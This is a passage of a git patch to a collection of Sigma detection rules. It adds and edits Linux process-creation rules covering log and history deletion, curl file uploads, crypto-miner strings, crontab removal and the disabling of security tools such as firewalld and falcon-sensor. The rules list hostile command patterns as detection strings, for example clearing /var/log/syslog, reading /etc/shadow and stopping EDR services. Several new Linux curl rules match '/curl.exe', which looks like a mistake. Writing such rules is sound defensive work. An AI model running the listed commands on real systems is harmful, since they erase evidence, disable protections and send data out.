logs on the system. Adversaries may clear system logs to hide evidence of an intrusion author: Ömer Günal, oscd.community date: 2020/10/07 -modified: 2022/07/07 +modified: 2022/09/15 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md logsource: @@ -15,6 +15,7 @@ detection: Image|endswith: - '/rm' # covers /rmdir as well - '/shred' + - '/unlink' CommandLine|contains: - '/var/log' - '/var/spool/mail' diff --git a/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml b/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml index 03cace922..42f0e639b 100644 --- a/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml +++ b/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml @@ -3,7 +3,7 @@ id: 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31 status: experimental description: Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks date: 2021/10/15 -modified: 2022/07/07 +modified: 2022/09/15 author: Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC tags: - attack.defense_evasion @@ -20,6 +20,10 @@ detection: - 'rm -r /var/log/syslog' - 'rm -f /var/log/syslog' - 'rm -rf /var/log/syslog' + - 'unlink /var/log/syslog' + - 'unlink -r /var/log/syslog' + - 'unlink -f /var/log/syslog' + - 'unlink -rf /var/log/syslog' - 'mv /var/log/syslog' - ' >/var/log/syslog' - ' > /var/log/syslog' diff --git a/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml b/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml index 8295856a4..c9c7a3f80 100644 --- a/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml +++ b/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml @@ -3,7 +3,7 @@ id: ec127035-a636-4b9a-8555-0efd4e59f316 status: experimental description: Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. date: 2021/10/15 -modified: 2022/07/07 +modified: 2022/09/15 author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC tags: - attack.collection @@ -14,19 +14,13 @@ logsource: product: linux category: process_creation detection: - selection1: + selection: Image|contains: 'xclip' - selection2: - CommandLine|contains: - - '-selection' + CommandLine|contains|all: - '-sel' - selection3: - CommandLine|contains: - - 'clipboard' - 'clip' - selection4: - CommandLine|contains: '-o' - condition: all of selection* + - '-o' + condition: selection falsepositives: - Legitimate usage of xclip tools. level: low diff --git a/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml b/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml new file mode 100644 index 000000000..454af266f --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml @@ -0,0 +1,21 @@ +title: Remove Scheduled Cron Task/Job +id: c2e234de-03a3-41e1-b39a-1e56dc17ba67 +status: experimental +description: Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible +author: Nasreddine Bencherchali +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: 'crontab' + CommandLine|contains: ' -r' + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.defense_evasion diff --git a/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml b/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml index cc4e2eb28..4a66f1c96 100644 --- a/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml +++ b/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml @@ -3,36 +3,36 @@ id: 9069ea3c-b213-4c52-be13-86506a227ab1 status: experimental description: Detects command line parameters or strings often used by crypto miners references: - - https://www.poolwatch.io/coin/monero + - https://www.poolwatch.io/coin/monero date: 2021/10/26 author: Florian Roth logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - CommandLine|contains: - - ' --cpu-priority=' - - '--donate-level=0' - - ' -o pool.' - - ' --nicehash' - - ' --algo=rx/0 ' - - 'stratum+tcp://' - - 'stratum+udp://' - # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives - - 'sh -c /sbin/modprobe msr allow_writes=on' - # base64 encoded: --donate-level= - - 'LS1kb25hdGUtbGV2ZWw9' - - '0tZG9uYXRlLWxldmVsP' - - 'tLWRvbmF0ZS1sZXZlbD' - # base64 encoded: stratum+tcp:// and stratum+udp:// - - 'c3RyYXR1bSt0Y3A6Ly' - - 'N0cmF0dW0rdGNwOi8v' - - 'zdHJhdHVtK3RjcDovL' - - 'c3RyYXR1bSt1ZHA6Ly' - - 'N0cmF0dW0rdWRwOi8v' - - 'zdHJhdHVtK3VkcDovL' - condition: selection + selection: + CommandLine|contains: + - ' --cpu-priority=' + - '--donate-level=0' + - ' -o pool.' + - ' --nicehash' + - ' --algo=rx/0 ' + - 'stratum+tcp://' + - 'stratum+udp://' + # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives + - 'sh -c /sbin/modprobe msr allow_writes=on' + # base64 encoded: --donate-level= + - 'LS1kb25hdGUtbGV2ZWw9' + - '0tZG9uYXRlLWxldmVsP' + - 'tLWRvbmF0ZS1sZXZlbD' + # base64 encoded: stratum+tcp:// and stratum+udp:// + - 'c3RyYXR1bSt0Y3A6Ly' + - 'N0cmF0dW0rdGNwOi8v' + - 'zdHJhdHVtK3RjcDovL' + - 'c3RyYXR1bSt1ZHA6Ly' + - 'N0cmF0dW0rdWRwOi8v' + - 'zdHJhdHVtK3VkcDovL' + condition: selection falsepositives: - - Legitimate use of crypto miners + - Legitimate use of crypto miners level: high diff --git a/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml new file mode 100644 index 000000000..730ba33df --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml @@ -0,0 +1,22 @@ +title: Curl Usage on Linux +id: ea34fb97-e2c4-4afb-810f-785e4459b194 +status: experimental +description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server +author: Nasreddine Bencherchali +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/curl.exe' + condition: selection +falsepositives: + - Scripts created by developers and admins + - Administrative activity +level: low +tags: + - attack.command_and_control + - attack.t1105 diff --git a/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml b/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml index c47444781..564c37a36 100644 --- a/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml +++ b/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml @@ -1,7 +1,7 @@ title: Linux Doas Tool Execution id: 067d8238-7127-451c-a9ec-fa78045b618b status: stable -description: Detects the doas tool execution in linux host platform. +description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does. references: - https://research.splunk.com/endpoint/linux_doas_tool_execution/ - https://www.makeuseof.com/how-to-install-and-use-doas/ diff --git a/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml b/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml index 34ac9dccd..85ee9c4e2 100644 --- a/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml +++ b/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml @@ -1,9 +1,10 @@ title: File Deletion id: 30aed7b6-d2c1-4eaf-9382-b6bc43e50c57 status: stable -description: Detects file deletion using "rm" or "shred" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity +description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity author: Ömer Günal, oscd.community date: 2020/10/07 +modified: 2022/09/15 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md logsource: @@ -14,6 +15,7 @@ detection: Image|endswith: - '/rm' # covers /rmdir as well - '/shred' + - '/unlink' condition: selection falsepositives: - Legitimate administration activities diff --git a/rules/linux/process_creation/proc_creation_lnx_local_account.yml b/rules/linux/process_creation/proc_creation_lnx_local_account.yml index d839d854b..058e10b0e 100644 --- a/rules/linux/process_creation/proc_creation_lnx_local_account.yml +++ b/rules/linux/process_creation/proc_creation_lnx_local_account.yml @@ -6,7 +6,7 @@ author: Alejandro Ortuno, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md date: 2020/10/08 -modified: 2022/07/07 +modified: 2022/09/15 logsource: category: process_creation product: linux @@ -16,9 +16,13 @@ detection: selection_2: CommandLine|contains: '''x:0:''' selection_3: - Image|endswith: '/cat' + Image|endswith: + - '/cat' + - '/head' + - '/tail' CommandLine|contains: - '/etc/passwd' + - '/etc/shadow' - '/etc/sudoers' selection_4: Image|endswith: '/id' diff --git a/rules/linux/process_creation/proc_creation_lnx_local_groups.yml b/rules/linux/process_creation/proc_creation_lnx_local_groups.yml index aa30ec573..ba0b9cad7 100644 --- a/rules/linux/process_creation/proc_creation_lnx_local_groups.yml +++ b/rules/linux/process_creation/proc_creation_lnx_local_groups.yml @@ -6,7 +6,7 @@ author: Ömer Günal, Alejandro Ortuno, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md date: 2020/10/11 -modified: 2022/07/07 +modified: 2022/09/15 logsource: category: process_creation product: linux @@ -14,7 +14,10 @@ detection: selection_1: Image|endswith: '/groups' selection_2: - Image|endswith: '/cat' + Image|endswith: + - '/cat' + - '/head' + - '/tail' CommandLine|contains: '/etc/group' condition: 1 of selection* falsepositives: diff --git a/rules/linux/process_creation/proc_creation_lnx_nohup.yml b/rules/linux/process_creation/proc_creation_lnx_nohup.yml index 1b8abaea7..1c902a284 100644 --- a/rules/linux/process_creation/proc_creation_lnx_nohup.yml +++ b/rules/linux/process_creation/proc_creation_lnx_nohup.yml @@ -4,17 +4,17 @@ status: experimental description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io' references: - - https://gtfobins.github.io/gtfobins/nohup/ - - https://en.wikipedia.org/wiki/Nohup - - https://www.computerhope.com/unix/unohup.htm + - https://gtfobins.github.io/gtfobins/nohup/ + - https://en.wikipedia.org/wiki/Nohup + - https://www.computerhope.com/unix/unohup.htm date: 2022/06/06 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - Image|endswith: '/nohup' - condition: selection + selection: + Image|endswith: '/nohup' + condition: selection falsepositives: - - Administrators or installed processes that leverage nohup + - Administrators or installed processes that leverage nohup level: medium diff --git a/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml b/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml index 7b7fbcd02..b56b56825 100644 --- a/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml +++ b/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml @@ -26,4 +26,4 @@ detection: condition: selection_image and 1 of selection_cli* falsepositives: - Unknown -level: high \ No newline at end of file +level: high diff --git a/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml b/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml index 76ac81188..1fef2d0a7 100644 --- a/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml +++ b/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml @@ -1,18 +1,21 @@ title: Security Software Discovery id: c9d8b7fd-78e4-44fe-88f6-599135d46d60 status: test -description: Detects usage of system utilities (only grep for now) to discover security software discovery +description: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery author: Daniil Yugoslavskiy, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md date: 2020/10/19 -modified: 2022/07/11 +modified: 2022/09/15 logsource: category: process_creation product: linux detection: selection: - Image|endswith: '/grep' + Image|endswith: + # You can add more grep variations such as fgrep, rgrep...etc + - '/grep' + - '/egrep' CommandLine|contains: - 'nessusd' # nessus vulnerability scanner - 'td-agent' # fluentd log shipper diff --git a/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml b/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml index b800cd73a..e48f83c9b 100644 --- a/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml +++ b/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml @@ -17,66 +17,66 @@ detection: selection_iptables_1: Image|endswith: '/service' CommandLine|contains|all: - - 'iptables' - - 'stop' + - 'iptables' + - 'stop' selection_iptables_2: Image|endswith: '/service' CommandLine|contains|all: - - 'ip6tables' - - 'stop' + - 'ip6tables' + - 'stop' selection_iptables_3: Image|endswith: '/chkconfig' CommandLine|contains|all: - - 'iptables' - - 'stop' + - 'iptables' + - 'stop' selection_iptables_4: Image|endswith: '/chkconfig' CommandLine|contains|all: - - 'ip6tables' - - 'stop' + - 'ip6tables' + - 'stop' selection_firewall_1: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'firewalld' - - 'stop' + - 'firewalld' + - 'stop' selection_firewall_2: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'firewalld' - - 'disable' + - 'firewalld' + - 'disable' selection_carbonblack_1: Image|endswith: '/service' CommandLine|contains|all: - - 'cbdaemon' - - 'stop' + - 'cbdaemon' + - 'stop' selection_carbonblack_2: Image|endswith: '/chkconfig' CommandLine|contains|all: - - 'cbdaemon' - - 'off' + - 'cbdaemon' + - 'off' selection_carbonblack_3: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'cbdaemon' - - 'stop' + - 'cbdaemon' + - 'stop' selection_carbonblack_4: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'cbdaemon' - - 'disable' + - 'cbdaemon' + - 'disable' selection_selinux: Image|endswith: '/setenforce' CommandLine|contains: '0' selection_crowdstrike_1: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'stop' - - 'falcon-sensor' + - 'stop' + - 'falcon-sensor' selection_crowdstrike_2: Image|endswith: '/systemctl' CommandLine|contains|all: - - 'disable' - - 'falcon-sensor' + - 'disable' + - 'falcon-sensor' condition: 1 of selection* falsepositives: - Legitimate administration activities diff --git a/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml new file mode 100644 index 000000000..130d9b5c8 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml @@ -0,0 +1,26 @@ +title: Disable Or Stop Servicess +id: de25eeb8-3655-4643-ac3a-b662d3f26b6b +status: experimental +description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services +author: Nasreddine Bencherchali +date: 2022/09/15 +references: + - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html +tags: + - attack.defense_evasion +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: + - '/service' + - '/systemctl' + - '/chkconfig' + CommandLine|contains: + - 'stop' + - 'disable' + condition: selection +falsepositives: + - Legitimate administration activities +level: medium diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml new file mode 100644 index 000000000..a38c1ef16 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml @@ -0,0 +1,38 @@ +title: Suspicious Curl File Upload - Linux +id: 00b90cc1-17ec-402c-96ad-3a8117d7a582 +related: + - id: 00bca14a-df4e-4649-9054-3f2aa676bc04 + type: derived +status: experimental +description: Detects a suspicious curl process start the adds a file to a web request +author: Nasreddine Bencherchali +references: + - https://twitter.com/d1r4c/status/1279042657508081664 + - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76 + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file + - https://curl.se/docs/manpage.html + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/curl.exe' + CommandLine|contains: + - ' -F ' + - ' --form ' + - ' --form-string ' + - ' -T ' + - ' --upload-file ' + - ' -d ' + - ' --data ' + - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode" + condition: selection +falsepositives: + - Scripts created by developers and admins +level: medium +tags: + - attack.exfiltration + - attack.t1567 + - attack.t1105 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml b/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml new file mode 100644 index 000000000..f38914616 --- /dev/null +++ b/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml @@ -0,0 +1,28 @@ +title: Suspicious Curl Change User Agents - Linux +id: b86d356d-6093-443d-971c-9b07db583c68 +related: + - id: 3286d37a-00fd-41c2-a624-a672dcd34e60 + type: derived +status: experimental +description: Detects a suspicious curl process start on linux with set useragent options +author: Nasreddine Bencherchali +references: + - https://curl.se/docs/manpage.html +date: 2022/09/15 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/curl' + CommandLine|contains: + - ' -A ' + - ' --user-agent ' + condition: selection +falsepositives: + - Scripts created by developers and admins + - Administrative activity +level: medium +tags: + - attack.command_and_control + - attack.t1071.001 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml index 3727dee7e..1e893bf23 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml @@ -4,23 +4,30 @@ status: experimental description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md date: 2022/06/20 +modified: 2022/09/15 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/rm' - selection_history: - - CommandLine|contains: - - '/.bash_history' - - '/.zsh_history' - - CommandLine|endswith: '_history' - condition: all of selection* + selection: + Image|endswith: + - '/rm' + - '/unlink' + selection_history: + - CommandLine|contains: + - '/.bash_history' + - '/.zsh_history' + - CommandLine|endswith: + - '_history' + - '.history' + - 'zhistory' + condition: all of selection* falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: high tags: - - attack.impact - - attack.t1565.001 + - attack.impact + - attack.t1565.001 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml index 93b722ac9..ffddb3b60 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml @@ -4,23 +4,31 @@ status: experimental description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/sleventyeleven/linuxprivchecker/ + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md date: 2022/06/20 +modified: 2022/09/15 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/cat' - selection_history: - - CommandLine|contains: - - '/.bash_history' - - '/.zsh_history' - - CommandLine|endswith: '_history' - condition: all of selection* + selection: + Image|endswith: + - '/cat' + - '/head' + - '/tail' + selection_history: + - CommandLine|contains: + - '/.bash_history' + - '/.zsh_history' + - CommandLine|endswith: + - '_history' + - '.history' + - 'zhistory' + condition: all of selection* falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: medium tags: - - attack.reconnaissance - - attack.t1592.004 + - attack.reconnaissance + - attack.t1592.004 diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml b/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml index 5401c761c..29fd55f03 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml @@ -3,29 +3,28 @@ id: ea3ecad2-db86-4a89-ad0b-132a10d2db55 status: experimental description: Detects suspicious interactive bash as a parent to rather uncommon child processes references: - - Internal Research + - Internal Research date: 2022/03/14 author: Florian Roth logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: selection: - ParentCommandLine: 'bash -i' + ParentCommandLine: 'bash -i' anomaly1: - CommandLine|contains: - - '-c import ' - - 'base64' - - 'pty.spawn' + CommandLine|contains: + - '-c import ' + - 'base64' + - 'pty.spawn' anomaly2: - Image|endswith: - - 'whoami' - - 'iptables' - - '/ncat' - - '/nc' - - '/netcat' + Image|endswith: + - 'whoami' + - 'iptables' + - '/ncat' + - '/nc' + - '/netcat' condition: selection and 1 of anomaly* falsepositives: - - Legitimate software that uses these patterns + - Legitimate software that uses these patterns level: medium - diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml b/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml index 3d057b223..9f4e466ec 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml @@ -3,7 +3,7 @@ id: 880973f3-9708-491c-a77b-2a35a1921158 status: experimental description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell references: - - Internal Research + - Internal Research date: 2022/03/14 modified: 2022/07/26 author: Florian Roth @@ -11,26 +11,25 @@ tags: - attack.defense_evasion - attack.t1140 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - CommandLine|startswith: - - 'sh -c ' - - 'bash -c ' - selection_exec: - - CommandLine|contains: + selection: + CommandLine|startswith: + - 'sh -c ' + - 'bash -c ' + selection_exec: + - CommandLine|contains: - '| bash ' - '| sh ' - '|bash ' - '|sh ' - - CommandLine|endswith: + - CommandLine|endswith: - '| bash' - '| sh' - '|bash' - ' |sh' - condition: all of selection* + condition: all of selection* falsepositives: - Legitimate software that uses these patterns level: medium - diff --git a/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml b/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml index 4b718aee7..6f04b95d5 100644 --- a/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml +++ b/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml @@ -6,13 +6,13 @@ author: Ömer Günal and remotephone, oscd.community references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md date: 2020/10/06 -modified: 2022/07/11 +modified: 2022/09/15 logsource: category: process_creation product: linux detection: - selection1: - Image|endswith: + selection: + - Image|endswith: - '/firewall-cmd' - '/ufw' - '/iptables' @@ -22,9 +22,8 @@ detection: - '/ifconfig' - '/systemd-resolve' - '/route' - selection2: - CommandLine|contains: '/etc/resolv.conf' - condition: 1 of selection* + - CommandLine|contains: '/etc/resolv.conf' + condition: selection falsepositives: - Legitimate administration activities level: informational diff --git a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml index 7d638a7f8..0e2f4a456 100644 --- a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml +++ b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml @@ -4,20 +4,19 @@ status: experimental description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges author: Nasreddine Bencherchali references: - - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275 + - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275 date: 2022/07/05 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/sudo' - CommandLine|contains: 'execve_hijack' - condition: selection + selection: + Image|endswith: '/sudo' + CommandLine|contains: 'execve_hijack' + condition: selection falsepositives: - - Unlikely + - Unlikely level: high tags: - - attack.defense_evasion - - attack.privilege_escalation - + - attack.defense_evasion + - attack.privilege_escalation diff --git a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml index d29fef02a..f453de63c 100644 --- a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml +++ b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml @@ -4,24 +4,24 @@ status: experimental description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script author: Nasreddine Bencherchali references: - - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh + - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh date: 2022/07/05 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: '/sudo' - CommandLine|contains|all: - - ' tc ' - - ' enp0s3 ' - CommandLine|contains: - - ' qdisc ' - - ' filter ' - condition: selection + selection: + Image|endswith: '/sudo' + CommandLine|contains|all: + - ' tc ' + - ' enp0s3 ' + CommandLine|contains: + - ' qdisc ' + - ' filter ' + condition: selection falsepositives: - - Unlikely + - Unlikely level: high tags: - - attack.defense_evasion - - attack.t1014 + - attack.defense_evasion + - attack.t1014 diff --git a/rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml b/rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml new file mode 100644 index 000000000..2513bcf86 --- /dev/null +++ b/rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml @@ -0,0 +1,25 @@ +title: Remove Immutable File Attribute +id: 34979410-e4b5-4e5d-8cfb-389fdff05c12 +related: + - id: a5b977d6-8a81-4475-91b9-49dbfcd941f7 + type: derived +status: experimental +description: Detects usage of the 'chattr' utility to remove immutable file attribute. +author: Nasreddine Bencherchali +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +date: 2022/09/15 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: '/chattr' + CommandLine|contains: ' -i ' + condition: selection +falsepositives: + - Administrator interacting with immutable files (e.g. for instance backups). +level: medium +tags: + - attack.defense_evasion + - attack.t1222.002 From 7a5017696fddafaa68eed8cc07b09e6e2fb90a69 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 09:23:15 +0200 Subject: [PATCH 033/120] Add more flag to curl windows rule --- .../proc_creation_win_susp_curl_fileupload.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml index 20ffcba7a..44c6f4373 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml @@ -9,7 +9,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file - https://curl.se/docs/manpage.html date: 2020/07/03 -modified: 2022/01/22 +modified: 2022/09/15 logsource: category: process_creation product: windows @@ -21,10 +21,12 @@ detection: CommandLine|contains: - ' -F ' - ' --form ' + - ' --form-string ' - ' -T ' - ' --upload-file ' - ' -d ' - ' --data ' + - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode" condition: all of selection* fields: - CommandLine From 33271e9034c648f98f3dd1313c2fc9d0f07effdf Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 16 Sep 2022 09:29:45 +0200 Subject: [PATCH 034/120] Quick update --- .../proc_creation_lnx_susp_history_delete.yml | 1 + .../proc_creation_macos_clear_system_logs.yml | 7 +++++-- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml index 1e893bf23..49cd31ce6 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml @@ -16,6 +16,7 @@ detection: Image|endswith: - '/rm' - '/unlink' + - '/shred' selection_history: - CommandLine|contains: - '/.bash_history' diff 